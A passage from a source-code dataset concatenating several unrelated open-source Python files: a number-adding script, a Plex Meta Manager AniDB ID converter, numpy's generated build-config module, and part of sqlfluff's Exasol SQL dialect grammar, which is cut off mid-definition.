] | null | null | null | Small Projects/Math/add.py | Sudo2td/Andromeda | aa34dea5ba99b510cb0645c835c4fce7f0407b80 | [
"MIT"
] | null | null | null | print("Add Numbers")
first_number = input("Enter First Number: ")
second_number = input("Enter Second Number: ")
print(float(first_number) + float(second_number))
input("Press Enter to Exit: ") | 32.333333 | 49 | 0.742268 |
72fe6c3a60af8d84132dbb43b76266a0ca6b27e8 | 7,173 | py | Python | modules/anidb.py | maciejzgadzaj/Plex-Meta-Manager | f25a13982d350d09ef18ec55dc93487676f5651a | [
"MIT"
] | null | null | null | modules/anidb.py | maciejzgadzaj/Plex-Meta-Manager | f25a13982d350d09ef18ec55dc93487676f5651a | [
"MIT"
] | null | null | null | modules/anidb.py | maciejzgadzaj/Plex-Meta-Manager | f25a13982d350d09ef18ec55dc93487676f5651a | [
"MIT"
] | null | null | null | import logging, requests
from lxml import html
from modules import util
from modules.util import Failed
from retrying import retry
logger = logging.getLogger("Plex Meta Manager")
class AniDBAPI:
def __init__(self, Cache=None, TMDb=None, Trakt=None):
self.Cache = Cache
self.TMDb = TMDb
self.Trakt = Trakt
self.urls = {
"anime": "https://anidb.net/anime",
"popular": "https://anidb.net/latest/anime/popular/?h=1",
"relation": "/relation/graph"
}
self.id_list = html.fromstring(requests.get("https://raw.githubusercontent.com/Anime-Lists/anime-lists/master/anime-list-master.xml").content)
def convert_anidb_to_tvdb(self, anidb_id): return self.convert_anidb(anidb_id, "anidbid", "tvdbid")
def convert_anidb_to_imdb(self, anidb_id): return self.convert_anidb(anidb_id, "anidbid", "imdbid")
def convert_tvdb_to_anidb(self, tvdb_id): return self.convert_anidb(tvdb_id, "tvdbid", "anidbid")
def convert_imdb_to_anidb(self, imdb_id): return self.convert_anidb(imdb_id, "imdbid", "anidbid")
def convert_anidb(self, input_id, from_id, to_id):
ids = self.id_list.xpath("//anime[contains(@{}, '{}')]/@{}".format(from_id, input_id, to_id))
if len(ids) > 0:
if from_id == "tvdbid": return [int(id) for id in ids]
if len(ids[0]) > 0:
try: return ids[0].split(",") if to_id == "imdbid" else int(ids[0])
except ValueError: raise Failed("AniDB Error: No {} ID found for {} ID: {}".format(util.pretty_ids[to_id], util.pretty_ids[from_id], input_id))
else: raise Failed("AniDB Error: No {} ID found for {} ID: {}".format(util.pretty_ids[to_id], util.pretty_ids[from_id], input_id))
else: raise Failed("AniDB Error: {} ID: {} not found".format(util.pretty_ids[from_id], input_id))
@retry(stop_max_attempt_number=6, wait_fixed=10000)
def send_request(self, url, language):
return html.fromstring(requests.get(url, headers={"Accept-Language": language, "User-Agent": "Mozilla/5.0 x64"}).content)
def get_popular(self, language):
response = self.send_request(self.urls["popular"], language)
return util.get_int_list(response.xpath("//td[@class='name anime']/a/@href"), "AniDB ID")
def validate_anidb_id(self, anidb_id, language):
response = self.send_request("{}/{}".format(self.urls["anime"], anidb_id), language)
ids = response.xpath("//*[text()='a{}']/text()".format(anidb_id))
if len(ids) > 0:
return util.regex_first_int(ids[0], "AniDB ID")
raise Failed("AniDB Error: AniDB ID: {} not found".format(anidb_id))
def get_anidb_relations(self, anidb_id, language):
response = self.send_request("{}/{}{}".format(self.urls["anime"], anidb_id, self.urls["relation"]), language)
return util.get_int_list(response.xpath("//area/@href"), "AniDB ID")
def validate_anidb_list(self, anidb_list, language):
anidb_values = []
for anidb_id in anidb_list:
try:
anidb_values.append(self.validate_anidb_id(anidb_id, language))
except Failed as e:
logger.error(e)
if len(anidb_values) > 0:
return anidb_values
raise Failed("AniDB Error: No valid AniDB IDs in {}".format(anidb_list))
def get_items(self, method, data, language, status_message=True):
pretty = util.pretty_names[method] if method in util.pretty_names else method
if status_message:
logger.debug("Data: {}".format(data))
anime_ids = []
if method == "anidb_popular":
if status_message:
logger.info("Processing {}: {} Anime".format(pretty, data))
anime_ids.extend(self.get_popular(language)[:data])
else:
if status_message: logger.info("Processing {}: {}".format(pretty, data))
if method == "anidb_id": anime_ids.append(data)
elif method == "anidb_relation": anime_ids.extend(self.get_anidb_relations(data, language))
else: raise Failed("AniDB Error: Method {} not supported".format(method))
show_ids = []
movie_ids = []
for anidb_id in anime_ids:
try:
tmdb_id = self.convert_from_imdb(self.convert_anidb_to_imdb(anidb_id), language)
if tmdb_id: movie_ids.append(tmdb_id)
else: raise Failed
except Failed:
try: show_ids.append(self.convert_anidb_to_tvdb(anidb_id))
except Failed: logger.error("AniDB Error: No TVDb ID or IMDb ID found for AniDB ID: {}".format(anidb_id))
if status_message:
logger.debug("AniDB IDs Found: {}".format(anime_ids))
logger.debug("TMDb IDs Found: {}".format(movie_ids))
logger.debug("TVDb IDs Found: {}".format(show_ids))
return movie_ids, show_ids
def convert_from_imdb(self, imdb_id, language):
output_tmdb_ids = []
if not isinstance(imdb_id, list):
imdb_id = [imdb_id]
for imdb in imdb_id:
if self.Cache:
tmdb_id, tvdb_id = self.Cache.get_ids_from_imdb(imdb)
expired = False
if not tmdb_id:
tmdb_id, expired = self.Cache.get_tmdb_from_imdb(imdb)
if expired:
tmdb_id = None
else:
tmdb_id = None
from_cache = tmdb_id is not None
if not tmdb_id and self.TMDb:
try: tmdb_id = self.TMDb.convert_imdb_to_tmdb(imdb)
except Failed: pass
if not tmdb_id and self.Trakt:
try: tmdb_id = self.Trakt.convert_imdb_to_tmdb(imdb)
except Failed: pass
try:
if tmdb_id and not from_cache: self.TMDb.get_movie(tmdb_id)
except Failed: tmdb_id = None
if tmdb_id: output_tmdb_ids.append(tmdb_id)
if self.Cache and tmdb_id and expired is not False:
self.Cache.update_imdb("movie", expired, imdb, tmdb_id)
if len(output_tmdb_ids) == 0: raise Failed("AniDB Error: No TMDb ID found for IMDb: {}".format(imdb_id))
elif len(output_tmdb_ids) == 1: return output_tmdb_ids[0]
else: return output_tmdb_ids
| 56.480315 | 192 | 0.549003 |
92becfca505c22e7e22accda031a221e087d6d34 | 1,551 | py | Python | lib/python2.7/site-packages/numpy/distutils/__config__.py | vishwabasak41/praicopy2 | 45fca251608d1621e75bfcc963bf5ff29d695336 | [
"MIT"
] | 7 | 2017-10-26T00:23:17.000Z | 2021-01-21T06:27:46.000Z | lib/python2.7/site-packages/numpy/distutils/__config__.py | vishwabasak41/praicopy2 | 45fca251608d1621e75bfcc963bf5ff29d695336 | [
"MIT"
] | 12 | 2017-05-23T22:54:50.000Z | 2019-07-31T17:26:17.000Z | lib/python2.7/site-packages/numpy/distutils/__config__.py | vishwabasak41/praicopy2 | 45fca251608d1621e75bfcc963bf5ff29d695336 | [
"MIT"
] | 5 | 2017-05-23T00:44:10.000Z | 2019-10-23T14:57:35.000Z | # This file is generated by numpy's setup.py
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
import os
import sys
extra_dll_dir = os.path.join(os.path.dirname(__file__), '.libs')
if sys.platform == 'win32' and os.path.isdir(extra_dll_dir):
os.environ.setdefault('PATH', '')
os.environ['PATH'] += os.pathsep + extra_dll_dir
lapack_opt_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
blas_opt_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
blis_info={}
openblas_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
openblas_lapack_info={'libraries': ['openblas', 'openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]}
lapack_mkl_info={}
blas_mkl_info={}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
| 43.083333 | 154 | 0.607995 |
b07482791437554a019a5180bdcd3d417d94e483 | 103,021 | py | Python | src/sqlfluff/dialects/dialect_exasol.py | quannh-uet/sqlfluff | 982aef19ab537e256ddc7e6fb2ac095e30959e4b | [
"MIT"
] | 1 | 2021-12-23T06:39:14.000Z | 2021-12-23T06:39:14.000Z | src/sqlfluff/dialects/dialect_exasol.py | quannh-uet/sqlfluff | 982aef19ab537e256ddc7e6fb2ac095e30959e4b | [
"MIT"
] | 1 | 2021-09-15T18:20:39.000Z | 2021-09-15T18:20:39.000Z | src/sqlfluff/dialects/dialect_exasol.py | tunetheweb/sqlfluff | 9504fc28af3142f3e4915b0adf5e31746df06e43 | [
"MIT"
] | null | null | null | """The EXASOL dialect.
https://docs.exasol.com
https://docs.exasol.com/sql_references/sqlstandardcompliance.htm
"""
from sqlfluff.core.parser import (
AnyNumberOf,
Anything,
BaseSegment,
Bracketed,
OptionallyBracketed,
BaseFileSegment,
Dedent,
Delimited,
GreedyUntil,
Indent,
KeywordSegment,
Nothing,
OneOf,
Ref,
Sequence,
StartsWith,
RegexLexer,
StringLexer,
CodeSegment,
CommentSegment,
NamedParser,
SymbolSegment,
StringParser,
RegexParser,
NewlineSegment,
)
from sqlfluff.core.dialects import load_raw_dialect
from sqlfluff.core.parser.segments.generator import SegmentGenerator
from sqlfluff.dialects.dialect_exasol_keywords import (
BARE_FUNCTIONS,
RESERVED_KEYWORDS,
SESSION_PARAMETERS,
SYSTEM_PARAMETERS,
UNRESERVED_KEYWORDS,
)
ansi_dialect = load_raw_dialect("ansi")
exasol_dialect = ansi_dialect.copy_as("exasol")
# Clear ANSI Keywords and add all EXASOL keywords
exasol_dialect.sets("unreserved_keywords").clear()
exasol_dialect.sets("unreserved_keywords").update(UNRESERVED_KEYWORDS)
exasol_dialect.sets("reserved_keywords").clear()
exasol_dialect.sets("reserved_keywords").update(RESERVED_KEYWORDS)
exasol_dialect.sets("bare_functions").clear()
exasol_dialect.sets("bare_functions").update(BARE_FUNCTIONS)
exasol_dialect.sets("session_parameters").clear()
exasol_dialect.sets("session_parameters").update(SESSION_PARAMETERS)
exasol_dialect.sets("system_parameters").clear()
exasol_dialect.sets("system_parameters").update(SYSTEM_PARAMETERS)
exasol_dialect.insert_lexer_matchers(
[
RegexLexer("lua_nested_quotes", r"\[={1,3}\[.*\]={1,3}\]", CodeSegment),
RegexLexer("lua_multiline_quotes", r"\[{2}([^[\\]|\\.)*\]{2}", CodeSegment),
RegexLexer("udf_param_dot_syntax", r"\.{3}", CodeSegment),
RegexLexer("range_operator", r"\.{2}", CodeSegment),
StringLexer("hash", "#", CodeSegment),
StringLexer(
"walrus_operator",
":=",
CodeSegment,
segment_kwargs={"type": "walrus_operator"},
),
RegexLexer(
"function_script_terminator",
r"\n/\n|\n/$",
CodeSegment,
segment_kwargs={"type": "function_script_terminator"},
subdivider=RegexLexer(
"newline",
r"(\n|\r\n)+",
NewlineSegment,
),
),
RegexLexer("atsign_literal", r"@[a-zA-Z_][\w]*", CodeSegment),
RegexLexer("dollar_literal", r"[$][a-zA-Z0-9_.]*", CodeSegment),
],
before="not_equal",
)
exasol_dialect.patch_lexer_matchers(
[
# In EXASOL, a double single/double quote resolves as a single/double quote in the string.
# It's also used for escaping single quotes inside of STATEMENT strings like in the IMPORT function
# https://docs.exasol.com/sql_references/basiclanguageelements.htm#Delimited_Identifiers
# https://docs.exasol.com/sql_references/literals.htm
RegexLexer("single_quote", r"'([^']|'')*'", CodeSegment),
RegexLexer("double_quote", r'"([^"]|"")*"', CodeSegment),
RegexLexer(
"inline_comment",
r"--[^\n]*",
CommentSegment,
segment_kwargs={"trim_start": ("--")},
),
]
)
# Access column aliases by using the LOCAL keyword
exasol_dialect.add(
LocalIdentifierSegment=StringParser(
"LOCAL", KeywordSegment, name="local_identifier", type="identifier"
),
UDFParameterDotSyntaxSegment=NamedParser(
"udf_param_dot_syntax", SymbolSegment, type="identifier"
),
RangeOperator=NamedParser("range_operator", SymbolSegment, type="range_operator"),
UnknownSegment=StringParser(
"unknown", KeywordSegment, name="boolean_literal", type="literal"
),
ForeignKeyReferencesClauseGrammar=Sequence(
"REFERENCES",
Ref("TableReferenceSegment"),
Ref("BracketedColumnReferenceListGrammar", optional=True),
),
ColumnReferenceListGrammar=Delimited(
Ref("ColumnReferenceSegment"),
ephemeral_name="ColumnReferenceList",
),
CommentIsGrammar=Sequence("COMMENT", "IS", Ref("QuotedLiteralSegment")),
# delimiter doesn't work for DISTRIBUTE and PARTITION BY
# expression because both expressions are splitted by comma
# as well as n columns within each expression
TableDistributeByGrammar=StartsWith(
Sequence(
"DISTRIBUTE",
"BY",
AnyNumberOf(
Sequence(
Ref("CommaSegment", optional=True),
Ref("ColumnReferenceSegment"),
),
min_times=1,
),
),
terminator=OneOf(
Ref("TablePartitionByGrammar"),
Ref("DelimiterSegment"),
),
enforce_whitespace_preceding_terminator=True,
),
TablePartitionByGrammar=StartsWith(
Sequence(
"PARTITION",
"BY",
AnyNumberOf(
Sequence(
Ref("CommaSegment", optional=True),
Ref("ColumnReferenceSegment"),
),
min_times=1,
),
),
terminator=OneOf(
Ref("TableDistributeByGrammar"),
Ref("DelimiterSegment"),
),
enforce_whitespace_preceding_terminator=True,
),
TableConstraintEnableDisableGrammar=OneOf("ENABLE", "DISABLE"),
EscapedIdentifierSegment=RegexParser(
# This matches escaped identifier e.g. [day]. There can be reserved keywords
# within the square brackets.
r"\[[A-Z]\]",
CodeSegment,
name="escaped_identifier",
type="identifier",
),
SessionParameterSegment=SegmentGenerator(
lambda dialect: RegexParser(
r"^(" + r"|".join(dialect.sets("session_parameters")) + r")$",
CodeSegment,
name="session_parameter",
type="session_parameter",
)
),
SystemParameterSegment=SegmentGenerator(
lambda dialect: RegexParser(
r"^(" + r"|".join(dialect.sets("system_parameters")) + r")$",
CodeSegment,
name="system_parameter",
type="system_parameter",
)
),
UDFParameterGrammar=OneOf(
# (A NUMBER, B VARCHAR) or (...)
Delimited(Ref("ColumnDatatypeSegment")),
Ref("UDFParameterDotSyntaxSegment"),
),
EmitsGrammar=Sequence(
"EMITS",
Bracketed(Ref("UDFParameterGrammar")),
),
FunctionScriptTerminatorSegment=NamedParser(
"function_script_terminator", CodeSegment, type="function_script_terminator"
),
WalrusOperatorSegment=NamedParser(
"walrus_operator", SymbolSegment, type="assignment_operator"
),
VariableNameSegment=RegexParser(
r"[A-Z][A-Z0-9_]*",
CodeSegment,
name="function_variable",
type="variable",
),
)
exasol_dialect.replace(
SingleIdentifierGrammar=OneOf(
Ref("LocalIdentifierSegment"),
Ref("NakedIdentifierSegment"),
Ref("QuotedIdentifierSegment"),
Ref("EscapedIdentifierSegment"),
),
ParameterNameSegment=RegexParser(
r"\"?[A-Z][A-Z0-9_]*\"?",
CodeSegment,
name="parameter",
type="parameter",
),
LikeGrammar=Ref.keyword("LIKE"),
IsClauseGrammar=OneOf(
"NULL",
Ref("BooleanLiteralGrammar"),
),
SelectClauseSegmentGrammar=Sequence(
"SELECT",
Ref("SelectClauseModifierSegment", optional=True),
Indent,
Delimited(
Ref("SelectClauseElementSegment"),
allow_trailing=True,
optional=True, # optional in favor of SELECT INVALID....
),
OneOf(Ref("WithInvalidUniquePKSegment"), Ref("IntoTableSegment"), optional=True)
# NB: The Dedent for the indent above lives in the
# SelectStatementSegment so that it sits in the right
# place corresponding to the whitespace.
),
SelectClauseElementTerminatorGrammar=OneOf(
Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
OneOf("UNIQUE", Ref("PrimaryKeyGrammar"), Ref("ForeignKeyGrammar")),
),
Sequence("INTO", "TABLE"),
"FROM",
"WHERE",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("CommaSegment"),
Ref("SetOperatorSegment"),
),
FromClauseTerminatorGrammar=OneOf(
"WHERE",
"CONNECT",
"START",
"PREFERRING",
"LIMIT",
Sequence("GROUP", "BY"),
Sequence("ORDER", "BY"),
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
WhereClauseTerminatorGrammar=OneOf(
"CONNECT",
"START",
"PREFERRING",
"LIMIT",
Sequence("GROUP", "BY"),
Sequence("ORDER", "BY"),
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
DateTimeLiteralGrammar=Sequence(
OneOf("DATE", "TIMESTAMP"), Ref("QuotedLiteralSegment")
),
CharCharacterSetSegment=OneOf(
Ref.keyword("UTF8"),
Ref.keyword("ASCII"),
),
PreTableFunctionKeywordsGrammar=Ref.keyword("TABLE"),
BooleanLiteralGrammar=OneOf(
Ref("TrueSegment"), Ref("FalseSegment"), Ref("UnknownSegment")
),
PostFunctionGrammar=OneOf(
Ref("EmitsGrammar"), # e.g. JSON_EXTRACT()
Sequence(
Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True),
Ref("OverClauseSegment"),
),
),
)
############################
# SELECT
############################
@exasol_dialect.segment(replace=True)
class SelectStatementSegment(BaseSegment):
"""A `SELECT` statement.
https://docs.exasol.com/sql/select.htm
"""
type = "select_statement"
match_grammar = StartsWith(
"SELECT",
terminator=Ref("SetOperatorSegment"),
enforce_whitespace_preceding_terminator=True,
)
parse_grammar = Sequence(
OneOf(
Sequence(
# to allow SELECT INVALID FOREIGN KEY
"SELECT",
Ref("SelectClauseModifierSegment", optional=True),
Indent,
Delimited(
Ref("SelectClauseElementSegment", optional=True),
allow_trailing=True,
optional=True,
),
Ref("WithInvalidForeignKeySegment"),
),
Sequence(
Ref("SelectClauseSegment"),
# # Dedent for the indent in the select clause.
# # It's here so that it can come AFTER any whitespace.
Dedent,
Ref("FromClauseSegment", optional=True),
),
),
Ref("WhereClauseSegment", optional=True),
Ref("ConnectByClauseSegment", optional=True),
Ref("PreferringClauseSegment", optional=True),
Ref("GroupByClauseSegment", optional=True),
Ref("HavingClauseSegment", optional=True),
Ref("QualifyClauseSegment", optional=True),
Ref("OrderByClauseSegment", optional=True),
Ref("LimitClauseSegment", optional=True),
)
@exasol_dialect.segment()
class WithInvalidUniquePKSegment(BaseSegment):
"""`WITH INVALID UNIQUE` or `WITH INVALID PRIMARY KEY` clause within `SELECT`."""
type = "with_invalid_unique_pk_clause"
match_grammar = StartsWith(
Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
OneOf("UNIQUE", Ref("PrimaryKeyGrammar")),
),
terminator="FROM",
)
parse_grammar = Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
OneOf("UNIQUE", Ref("PrimaryKeyGrammar")),
Ref("BracketedColumnReferenceListGrammar"),
)
@exasol_dialect.segment()
class WithInvalidForeignKeySegment(BaseSegment):
"""`WITH INVALID FOREIGN KEY` clause within `SELECT`."""
type = "with_invalid_foreign_key_clause"
match_grammar = StartsWith(
Sequence(
Ref.keyword("WITH", optional=True), "INVALID", Ref("ForeignKeyGrammar")
),
terminator=Ref("FromClauseTerminatorGrammar"),
)
parse_grammar = Sequence(
Ref.keyword("WITH", optional=True),
"INVALID",
Ref("ForeignKeyGrammar"),
Ref("BracketedColumnReferenceListGrammar"),
Dedent, # dedent for the indent in the select clause
"FROM",
Ref("TableReferenceSegment"),
"REFERENCING",
Ref("TableReferenceSegment"),
Ref("BracketedColumnReferenceListGrammar", optional=True),
)
@exasol_dialect.segment()
class IntoTableSegment(BaseSegment):
"""`INTO TABLE` clause within `SELECT`."""
type = "into_table_clause"
match_grammar = StartsWith(Sequence("INTO", "TABLE"), terminator="FROM")
parse_grammar = Sequence("INTO", "TABLE", Ref("TableReferenceSegment"))
@exasol_dialect.segment(replace=True)
class TableExpressionSegment(BaseSegment):
"""The main table expression e.g. within a FROM clause."""
type = "table_expression"
match_grammar = OneOf(
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
Ref("TableReferenceSegment"),
Bracketed(Ref("SelectableGrammar")),
Ref("ValuesRangeClauseSegment"),
Ref("ValuesClauseSegment"),
Ref("ImportStatementSegment"), # subimport
Ref("ExplainVirtualSegment"),
)
@exasol_dialect.segment(replace=True)
class ValuesClauseSegment(BaseSegment):
"""A `VALUES` clause within in `WITH` or `SELECT`."""
type = "values_clause"
match_grammar = Sequence(
"VALUES",
Delimited(
OneOf(
Bracketed(
Delimited(
Ref("LiteralGrammar"),
Ref("IntervalExpressionSegment"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
ephemeral_name="ValuesClauseElements",
)
),
Delimited(
# e.g. SELECT * FROM (VALUES 1,2,3);
Ref("LiteralGrammar"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
),
),
),
Ref("AliasExpressionSegment", optional=True),
)
@exasol_dialect.segment()
class ValuesRangeClauseSegment(BaseSegment):
"""A `VALUES BETWEEN` clause within a `SELECT` statement.
Supported since Exasol 7.1!
"""
type = "values_range_clause"
match_grammar = Sequence(
"VALUES",
"BETWEEN",
Ref("NumericLiteralSegment"),
"AND",
Ref("NumericLiteralSegment"),
Sequence("WITH", "STEP", Ref("NumericLiteralSegment"), optional=True),
)
@exasol_dialect.segment(replace=True)
class SetOperatorSegment(BaseSegment):
"""A set operator such as Union, Minus, Except or Intersect."""
type = "set_operator"
match_grammar = OneOf(
Sequence("UNION", Ref.keyword("ALL", optional=True)),
"INTERSECT",
OneOf("MINUS", "EXCEPT"),
)
@exasol_dialect.segment()
class ConnectByClauseSegment(BaseSegment):
"""`CONNECT BY` clause within a select statement."""
type = "connect_by_clause"
match_grammar = StartsWith(
OneOf(
Sequence("CONNECT", "BY"),
Sequence("START", "WITH"),
),
terminator=OneOf(
"PREFERRING",
Sequence("GROUP", "BY"),
"QUALIFY",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("SetOperatorSegment"),
),
enforce_whitespace_preceding_terminator=True,
)
parse_grammar = OneOf(
Sequence(
"CONNECT",
"BY",
Ref.keyword("NOCYCLE", optional=True),
Delimited(
Ref("ExpressionSegment"),
delimiter="AND",
terminator="START",
),
Sequence("START", "WITH", Ref("ExpressionSegment"), optional=True),
),
Sequence(
"START",
"WITH",
Ref("ExpressionSegment"),
"CONNECT",
"BY",
Ref.keyword("NOCYCLE", optional=True),
Delimited(Ref("ExpressionSegment"), delimiter="AND"),
),
)
@exasol_dialect.segment(replace=True)
class GroupByClauseSegment(BaseSegment):
"""A `GROUP BY` clause like in `SELECT`."""
type = "groupby_clause"
match_grammar = StartsWith(
Sequence("GROUP", "BY"),
terminator=OneOf(
Sequence("ORDER", "BY"),
"LIMIT",
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
enforce_whitespace_preceding_terminator=True,
)
parse_grammar = Sequence(
"GROUP",
"BY",
Indent,
Delimited(
OneOf(
Ref("ColumnReferenceSegment"),
# Can `GROUP BY 1`
Ref("NumericLiteralSegment"),
# Can `GROUP BY coalesce(col, 1)`
Ref("ExpressionSegment"),
Ref("CubeRollupClauseSegment"),
Ref("GroupingSetsClauseSegment"),
Bracketed(), # Allows empty parentheses
),
terminator=OneOf(
Sequence("ORDER", "BY"),
"LIMIT",
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
),
Dedent,
)
@exasol_dialect.segment()
class CubeRollupClauseSegment(BaseSegment):
"""`CUBE` / `ROLLUP` clause within the `GROUP BY` clause."""
type = "cube_rollup_clause"
match_grammar = StartsWith(
OneOf("CUBE", "ROLLUP"),
terminator=OneOf(
"HAVING",
"QUALIFY",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("SetOperatorSegment"),
),
)
parse_grammar = Sequence(
OneOf("CUBE", "ROLLUP"),
Bracketed(
Ref("GroupingExpressionList"),
),
)
@exasol_dialect.segment()
class GroupingSetsClauseSegment(BaseSegment):
"""`GROUPING SETS` clause within the `GROUP BY` clause."""
type = "grouping_sets_clause"
match_grammar = StartsWith(
Sequence("GROUPING", "SETS"),
terminator=OneOf(
"HAVING",
"QUALIFY",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("SetOperatorSegment"),
),
)
parse_grammar = Sequence(
"GROUPING",
"SETS",
Bracketed(
Delimited(
Ref("CubeRollupClauseSegment"),
Ref("GroupingExpressionList"),
Bracketed(), # Allows empty parentheses
)
),
)
@exasol_dialect.segment()
class GroupingExpressionList(BaseSegment):
"""Grouping expression list within `CUBE` / `ROLLUP` `GROUPING SETS`."""
type = "grouping_expression_list"
match_grammar = Delimited(
OneOf(
Bracketed(Delimited(Ref("ExpressionSegment"))),
Ref("ExpressionSegment"),
)
)
@exasol_dialect.segment()
class QualifyClauseSegment(BaseSegment):
"""`QUALIFY` clause within `SELECT`."""
type = "qualify_clause"
match_grammar = StartsWith(
"QUALIFY",
terminator=OneOf(
Sequence("ORDER", "BY"),
"LIMIT",
Ref("SetOperatorSegment"),
),
)
parse_grammar = Sequence("QUALIFY", Ref("ExpressionSegment"))
@exasol_dialect.segment(replace=True)
class LimitClauseSegment(BaseSegment):
"""A `LIMIT` clause like in `SELECT`."""
type = "limit_clause"
match_grammar = StartsWith("LIMIT")
parse_grammar = Sequence(
"LIMIT",
OneOf(
Sequence( # offset, count
Ref("NumericLiteralSegment"),
Ref("CommaSegment"),
Ref("NumericLiteralSegment"),
),
Sequence( # count [OFFSET offset]
Ref("NumericLiteralSegment"),
Sequence("OFFSET", Ref("NumericLiteralSegment"), optional=True),
),
),
)
############################
# DROP
############################
@exasol_dialect.segment(replace=True)
class DropStatementSegment(BaseSegment):
"""A `DROP` statement without any options."""
type = "drop_statement"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith("DROP")
parse_grammar = OneOf(
Ref("DropWithouOptionsStatementSegment"),
Ref("DropCascadeStatementSegment"),
Ref("DropCascadeRestrictStatementSegment"),
Ref("DropSchemaStatementSegment"),
Ref("DropTableStatementSegment"),
)
@exasol_dialect.segment()
class DropWithouOptionsStatementSegment(BaseSegment):
"""A `DROP` statement without any options."""
type = "drop_wo_options"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = Sequence(
"DROP",
OneOf(
"CONNECTION",
Sequence(
Ref.keyword("ADAPTER", optional=True),
"SCRIPT",
),
Sequence("CONSUMER", "GROUP"),
),
Ref("IfExistsGrammar", optional=True),
Ref("ObjectReferenceSegment"),
)
@exasol_dialect.segment()
class DropCascadeStatementSegment(BaseSegment):
"""A `DROP` statement with CASCADE option.
https://docs.exasol.com/sql/drop_role.htm
https://docs.exasol.com/sql/drop_user.htm
"""
type = "drop_cascade"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = Sequence(
"DROP",
OneOf(
"USER",
"ROLE",
),
Ref("IfExistsGrammar", optional=True),
Ref("ObjectReferenceSegment"),
Ref.keyword("CASCADE", optional=True),
)
@exasol_dialect.segment()
class DropCascadeRestrictStatementSegment(BaseSegment):
"""A `DROP` statement with CASCADE and RESTRICT option.
https://docs.exasol.com/sql/drop_view.htm
https://docs.exasol.com/sql/drop_function.htm
"""
type = "drop_cascade_restrict"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = Sequence(
"DROP",
OneOf(
"VIEW",
"FUNCTION",
),
Ref("IfExistsGrammar", optional=True),
Ref("ObjectReferenceSegment"),
OneOf("RESTRICT", "CASCADE", optional=True),
)
############################
# SCHEMA
############################
@exasol_dialect.segment(replace=True)
class CreateSchemaStatementSegment(BaseSegment):
"""A `CREATE SCHEMA` statement.
https://docs.exasol.com/sql/create_schema.htm
"""
type = "create_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("CREATE", "SCHEMA"))
parse_grammar = Sequence(
"CREATE",
"SCHEMA",
Ref("IfNotExistsGrammar", optional=True),
Ref("SchemaReferenceSegment"),
)
@exasol_dialect.segment()
class CreateVirtualSchemaStatementSegment(BaseSegment):
"""A `CREATE VIRUTAL SCHEMA` statement.
https://docs.exasol.com/sql/create_schema.htm
"""
type = "create_virtual_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("CREATE", "VIRTUAL", "SCHEMA"))
parse_grammar = Sequence(
"CREATE",
"VIRTUAL",
"SCHEMA",
Ref("IfNotExistsGrammar", optional=True),
Ref("SchemaReferenceSegment"),
"USING",
Ref("ObjectReferenceSegment"),
Ref.keyword("WITH", optional=True),
AnyNumberOf(
Sequence(
Ref("ParameterNameSegment"),
Ref("EqualsSegment"),
Ref("LiteralGrammar"),
)
),
)
@exasol_dialect.segment()
class AlterSchemaStatementSegment(BaseSegment):
"""A `ALTER VIRUTAL SCHEMA` statement.
https://docs.exasol.com/sql/alter_schema.htm
"""
type = "alter_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("ALTER", "SCHEMA"))
parse_grammar = Sequence(
"ALTER",
"SCHEMA",
Ref("SchemaReferenceSegment"),
OneOf(
Sequence(
"SET",
"RAW_SIZE_LIMIT",
Ref("EqualsSegment"),
AnyNumberOf(Ref("NumericLiteralSegment"), Ref("StarSegment")),
),
Sequence("CHANGE", "OWNER", Ref("SchemaReferenceSegment")),
),
)
@exasol_dialect.segment()
class AlterVirtualSchemaStatementSegment(BaseSegment):
"""A `ALTER VIRUTAL SCHEMA` statement.
https://docs.exasol.com/sql/alter_schema.htm
"""
type = "alter_virtual_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("ALTER", "VIRTUAL", "SCHEMA"))
parse_grammar = Sequence(
"ALTER",
"VIRTUAL",
"SCHEMA",
Ref("SchemaReferenceSegment"),
OneOf(
Sequence(
"SET",
AnyNumberOf(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("EqualsSegment"),
Ref("LiteralGrammar"),
)
),
),
Sequence(
"REFRESH",
Sequence(
"TABLES",
